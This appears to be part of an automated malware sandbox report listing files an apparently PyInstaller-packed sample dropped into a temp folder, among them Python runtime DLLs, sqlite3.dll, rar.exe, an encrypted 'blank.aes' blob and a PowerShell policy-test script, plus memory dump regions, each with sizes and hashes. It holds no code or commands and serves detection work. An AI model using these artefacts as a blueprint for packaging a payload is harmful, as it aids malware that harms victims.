ba92010d9ea1aac259bdc7c268c09acc3b013a143f66abd2f903a0d02bdd86aca2a50947129c1dec4f364f6b972d0068d75c785eeb9f2feaef7c87b16c06743e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-synch-l1-1-0.dll

Filesize
15KB

MD5
b79055fc0eed8de5b742d2fc7972b617

SHA1
a0f9662f98562d593acb210b09445ec3989ae033

SHA256
a06592d4c99d818bbc428599a03d14d7ca911e305183689d464421ed0d5c5838

SHA512
952aabcdfeb5dd53d0369682390a842d3304db054c214a626db571a7f1bd2b73a0f422ee4e699e400585f9bfaf0e528b5dab31f8779f659f993d3edc3400cb5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-synch-l1-2-0.dll

Filesize
13KB

MD5
9c11f9af976dcb53c7f84d025bd2b03b

SHA1
45150a48f796a16bcafc71759bc87ae071b2fcd7

SHA256
a3e53af258a6bfc945275db05fd800646da13d36dc17f7c278e2a7eea25f9bcd

SHA512
8167d1d5c9e7bae0bfd5c8653dae27cb9ba649fd735a18bd1c0d427c01fdfa663f9055fe669b9733849e607f2883fba2991b23b2c486c5a7aa930aa1881a32c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
14KB

MD5
0264aa6daf96369536f93ef8687880f2

SHA1
35f850491629ea8ad6a9a7573095e1e7a21067b5

SHA256
e5e231a1f38c54d80de41ac97201726106744c45732064962efa3fb8f823a343

SHA512
19b478e67b716fc39133828f06fa488a0cf85555f0fccb67655b35ac7730c4db4f895fcdaa38f353e10eff9ff6d1ee683131bdbd1d4cfde6665cd47ba28169d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-timezone-l1-1-0.dll

Filesize
13KB

MD5
020ee3aab95a1683088ae4df324fe169

SHA1
9fcf3e08a8df8249adf3bb6215d521f1c427ad54

SHA256
4299bbd7bb8cf433093d76ee8be5f7042a376221d1ba4ca7c6b97d477738bed5

SHA512
309ff39b8d3f3de6fc8fe72549abffe7b168e75b0a9d78a0e885afde5e5b87a25589df58b4a72570a40e3bbd2f3d4cab90eb550da315f9a5b19256857b8cbd81

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-core-util-l1-1-0.dll

Filesize
13KB

MD5
8954eeea3836fab6d92c99a7f8823ce6

SHA1
ff90b787147157fadde1eb38a4352a88b2d88fc7

SHA256
616fb810e057d2cfdec697a25a583b349a8ea4299d1b1ba175373baf7e04f3d2

SHA512
8af068d2c739fb50e1ac4160678d9b4bc744aa2764e5049ab58dfbedb08a1b5253bce481e9c1a8b6a3b916f8a3434f803e02651541f4e0e8eba945abb103e5a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-conio-l1-1-0.dll

Filesize
14KB

MD5
108cd73f6e2f731d30e080b82db844cf

SHA1
5bbd6cb6eace8b30425ea7ad2f4a49e5dc2daff2

SHA256
df6c3e097d98936604191671aedb33e19bcafc48315d58053ee4bf65cd2cc1b6

SHA512
744276f5fd20f27855d9a09795982d541bb8bbf79052afe34b4b2d64e8ed161e90d746ab48cced93cf925340d5f5d3d489eb6f47e6a84b8f709e841d7269b346

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-convert-l1-1-0.dll

Filesize
17KB

MD5
7281f9cea5792aba4cfb8c383ea00f3c

SHA1
a41ce0ba692748936ada8afe726c3ca9d53f149b

SHA256
aabcc3586424f31caf11405de2892df6ff3dbddba0b449620caa8963d13c2011

SHA512
ff444ac7c3ab18944c43f249ad3075cb404fb5b8b34ade4babad8352ef6e328c59e114ca786006933b6092d43e53c21ed3977743f4b049c8c586dd326d579afc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-environment-l1-1-0.dll

Filesize
13KB

MD5
5deeeaf7774dc10f17c2c084043dfdb8

SHA1
e9cbfeb90b800fa41347a91de0607823fc539f88

SHA256
f5d4396a2193cb2e0f762c1a5ea9ed34f9069952792fb7b9166be05402e54281

SHA512
bee5c5b9e26ab11dd41b720c17ee073129787a844b12538f50995c60fe152c25b5619ac96afb58ad3bfe3fdd1de5ec2188c29b80557d7f3e89c1f6c87a19cb9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-filesystem-l1-1-0.dll

Filesize
15KB

MD5
114e59b60b3bba59bad69d84a0efd504

SHA1
1c56401858b90e0ec730c0f455fdf6d8dd7fd3de

SHA256
eabca6bcb5534179e9b2475b76428d028fbf0df571322fbf3e8ae2b4680eb4fc

SHA512
de33ca9e702e9704585f6046ece7d5bfa9a931e33da2711704ea7b5d95cf44bede22391f087767dbcf0654888687fb3539988c121020c663f6b2472ae0a99649

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-heap-l1-1-0.dll

Filesize
14KB

MD5
baaf23bf582249963d573611bf171cbb

SHA1
ae3145aea40a9593985cadfa3fff49c89c25275f

SHA256
41915baf3fcb1128cc763e1be2f870c6e5733b1395d9a8b3f481991cdb345788

SHA512
283518707527434c51e42f8c179217c7c51e3735cc6e50bd6c7a09cd0eab32972c68a1aedda35ecc1668d4390422db76424cedf9b002f06b3297049df6d3e74c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-locale-l1-1-0.dll

Filesize
13KB

MD5
de2237c2a146585790d9d8f4bd5760dd

SHA1
38428e85cd99954b67d4c0ce54101e5787bff757

SHA256
c01977d05b9cf485d089ed5bb0e537f664fea07006c54334ef958b803dfa9fbf

SHA512
be50a97c2789537496e46ee17d5d9d1a89fddfe52b779cfb52d0465167aac0044cabbec88d564c44fad2a188ade94e31f7a8e1504059b8309ace93c55be82ca6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-math-l1-1-0.dll

Filesize
22KB

MD5
1d8fcff6058548d114dcce67591f66aa

SHA1
97f8058f4bafd6de73557f9254c76453da029ec0

SHA256
670766f8fbdd92673fef5f69c8baee4ebfc71458661adeb7ecea945a86d5e4c8

SHA512
19ded05ef822f542e2bb2e8e9e2ffe34180657ce2737e87fce57ea894dc14601070b4858c696216e5429e3299c5577b5d23c88589ab32a25cae6aa61589a6c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-process-l1-1-0.dll

Filesize
14KB

MD5
6f2d0ee976848f571a47b268e3a05cf0

SHA1
d2b3aaef23e46d0ef98f4ab776ed70d444769010

SHA256
d2d1748209040596e10d6e61b021173ab5e714baf3f2ea707fe7baac3e3b57b2

SHA512
1553015d58c4186a44edc2e177d93892a1d7c9b99e90310fbde96d813ad3d02b3aef0876b598c0a051d0f93cec933dbc6fae7b33bdadb44cdfaac2ecb0ffc434

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
17KB

MD5
0d7132c72f8c32a0fad4c3e26c443d87

SHA1
3a94d13247f1ba75b1c4efe2027b70d2fcf80d5d

SHA256
c66e1a1edc4cae72c10bcd872133f3cca6e11a08062a3592e0e1fa0ce3a0de22

SHA512
cc9fcdc6004d474fdfef5d07774efc65af690e74f2082c7c8c303e39cf8e907056fce920b9aec983c5d2f8baf0e4b99a8859b178dae3e070d31828e0ce62a238

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-stdio-l1-1-0.dll

Filesize
19KB

MD5
ead4a6c3264edab91dcc9be43e969344

SHA1
dfb4d803bd65035e48aa5a182bede0f9acecab94

SHA256
570fe482c46ffed44181b057e44c844f20842450370f7728a11c779ab3a10475

SHA512
33dfa3ba321427b8fe3634af52d11f1842b185f20140b8171e623a7f3bee13b619b032d12aee194d26d283d5f133e9277d70720819e5177cf73905a82b858d08

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-string-l1-1-0.dll

Filesize
19KB

MD5
6213903f90e868e8b0062fa789a8e366

SHA1
eb75588819499f7dbef8514832ed18c40e6bd9ef

SHA256
b9ca9808ed3be915a4c80df64ba9128a1ca0cfa029db3e934ec6654ddfa209e7

SHA512
8d38d3b85109a77a97757e4e5e10dc7985c1eeeb1e688276221363ee2e0de338c883f63c9ab886d92e17d0ee7bbad19d2d8e89a139ed21fa47cb19fe4bff2ff1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-time-l1-1-0.dll

Filesize
15KB

MD5
b86822fa08a42c2935eb803515105b79

SHA1
212294f90fd3a358d4ce663dcd1038ff85cb1de2

SHA256
31c51088b7137711fd0a2df43382073c6da63ccc17c269c258483d7dd1507533

SHA512
9933372497be4be75251e9f3c7a9d0942e963714cfacf4e9042d06cb9b136859d95f57c0810304b4e5d4ed68361b71c5d9adb7469fb239fc8467e0ef4b0e966a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\api-ms-win-crt-utility-l1-1-0.dll

Filesize
13KB

MD5
6eb3afdf67e29cecf05bc7ed2f7df81f

SHA1
b154e4b3eb38e916d4a6cb85868db16837d009c9

SHA256
d342564a813e8530ff8fb0a4c59aa8e63c05c2da72aa576c6d6411abde34343f

SHA512
37a0943a6f2f2a66eff5f407a7918e5893f146efcdfd7875ddd97f21b405cf537f43ec9fae236baecc6777bae93aacccc73ad8e4df924a6abc17f5a004574e13

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\base_library.zip

Filesize
859KB

MD5
f5b15ac0a24a122d69c41843da5d463b

SHA1
e25772476631d5b6dd278cb646b93abd282c34ed

SHA256
ec3b8c865c6e3c5e35449b32dcb397da665d6a10fbee61284489a6c420c72a3b

SHA512
1704611166d63962e14deb6d519c2a7af4f05bca308c1949652fddf89bc526c594ede43a34b9306e5979998576f448951d08ad9e25b6d749d5d46b7d18d133b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\blank.aes

Filesize
75KB

MD5
c1818ee8bb43ec499fbca5fbb968f944

SHA1
028960513fe145763e5041cfd81a76982876c6d2

SHA256
42b379a164ddcff09b687d6bec771f16f9039d98961966c4a61427074be71a81

SHA512
b9776443324c526d4407f76bac024c5abf101bea308e70722245fe84712a121c586d09c9e50b9aba0cb4d197f065d8807cc1cd3e7ada77c913c88a371713dd30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libcrypto-1_1.dll

Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libffi-7.dll

Filesize
23KB

MD5
6f818913fafe8e4df7fedc46131f201f

SHA1
bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

SHA256
3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

SHA512
5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\python310.dll

Filesize
1.4MB

MD5
178a0f45fde7db40c238f1340a0c0ec0

SHA1
dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

SHA256
9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

SHA512
4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\select.pyd

Filesize
24KB

MD5
666358e0d7752530fc4e074ed7e10e62

SHA1
b9c6215821f5122c5176ce3cf6658c28c22d46ba

SHA256
6615c62fa010bfba5527f5da8af97313a1af986f8564277222a72a1731248841

SHA512
1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\sqlite3.dll

Filesize
608KB

MD5
bd2819965b59f015ec4233be2c06f0c1

SHA1
cff965068f1659d77be6f4942ca1ada3575ca6e2

SHA256
ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec

SHA512
f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\ucrtbase.dll

Filesize
987KB

MD5
672a181cbce053a57c86250874ee9ae2

SHA1
d594a6e42dcdd6818121670ef2dd7abc9b0fdd4b

SHA256
b3a65c97fc2f830910230c8349df835a838384766332ba7cbec32933a8d46e64

SHA512
10b1fca8217a2437af9710f42fd8cfa4a861f73260856a267a2eda6a51675eca8e7fc5b0c276eadcf239e89d783049b75c556e3b93ceff0de80042054461b25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\unicodedata.pyd

Filesize
287KB

MD5
7a462a10aa1495cef8bfca406fb3637e

SHA1
6dcbd46198b89ef3007c76deb42ab10ba4c4cf40

SHA256
459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0

SHA512
d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cswclsdg.tko.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3168-158-0x0000023FEE4B0000-0x0000023FEE4D2000-memory.dmp

Filesize
136KB

Download
memory/4460-262-0x000001E8F8F60000-0x000001E8F8F68000-memory.dmp

Filesize
32KB

Download
memory/5028-140-0x00000173BD670000-0x00000173BD9E5000-memory.dmp

Filesize
3.5MB

Download
memory/5028-147-0x00007FFE0B640000-0x00007FFE0B758000-memory.dmp

Filesize
1.1MB

Download
memory/5028-133-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp

Filesize
124KB

Download
memory/5028-134-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp

Filesize
1.4MB

Download
memory/5028-135-0x00007FFE207E0000-0x00007FFE207F9000-memory.dmp

Filesize
100KB

Download
memory/5028-136-0x00007FFE20570000-0x00007FFE2057D000-memory.dmp

Filesize
52KB

Download
memory/5028-137-0x00007FFE1B110000-0x00007FFE1B13E000-memory.dmp

Filesize
184KB

Download
memory/5028-138-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp

Filesize
4.4MB

Download
memory/5028-142-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp

Filesize
144KB

Download
memory/5028-141-0x00007FFE0B760000-0x00007FFE0BAD5000-memory.dmp

Filesize
3.5MB

Download
memory/5028-131-0x00007FFE1E790000-0x00007FFE1E7BD000-memory.dmp

Filesize
180KB

Download
memory/5028-139-0x00007FFE1AA20000-0x00007FFE1AAD8000-memory.dmp

Filesize
736KB

Download
memory/5028-145-0x00007FFE20560000-0x00007FFE2056D000-memory.dmp

Filesize
52KB

Download
memory/5028-144-0x00007FFE1E790000-0x00007FFE1E7BD000-memory.dmp

Filesize
180KB

Download
memory/5028-143-0x00007FFE1B0F0000-0x00007FFE1B104000-memory.dmp

Filesize
80KB

Download
memory/5028-132-0x00007FFE23460000-0x00007FFE23479000-memory.dmp

Filesize
100KB

Download
memory/5028-146-0x00007FFE23460000-0x00007FFE23479000-memory.dmp

Filesize
100KB

Download
memory/5028-66-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp

Filesize
4.4MB

Download
memory/5028-71-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp

Filesize
144KB

Download
memory/5028-170-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp

Filesize
124KB

Download
memory/5028-182-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp

Filesize
1.4MB

Download
memory/5028-250-0x00007FFE207E0000-0x00007FFE207F9000-memory.dmp

Filesize
100KB

Download
memory/5028-73-0x00007FFE23EB0000-0x00007FFE23EBF000-memory.dmp

Filesize
60KB

Download
memory/5028-320-0x00007FFE1B110000-0x00007FFE1B13E000-memory.dmp

Filesize
184KB

Download
memory/5028-321-0x00000173BD670000-0x00000173BD9E5000-memory.dmp

Filesize
3.5MB

Download
memory/5028-324-0x00007FFE1AA20000-0x00007FFE1AAD8000-memory.dmp

Filesize
736KB

Download
memory/5028-326-0x00007FFE0B760000-0x00007FFE0BAD5000-memory.dmp

Filesize
3.5MB

Download
memory/5028-347-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp

Filesize
4.4MB

Download
memory/5028-362-0x00007FFE20560000-0x00007FFE2056D000-memory.dmp

Filesize
52KB

Download
memory/5028-353-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp

Filesize
1.4MB

Download
memory/5028-352-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp

Filesize
124KB

Download
memory/5028-348-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp

Filesize
144KB

Download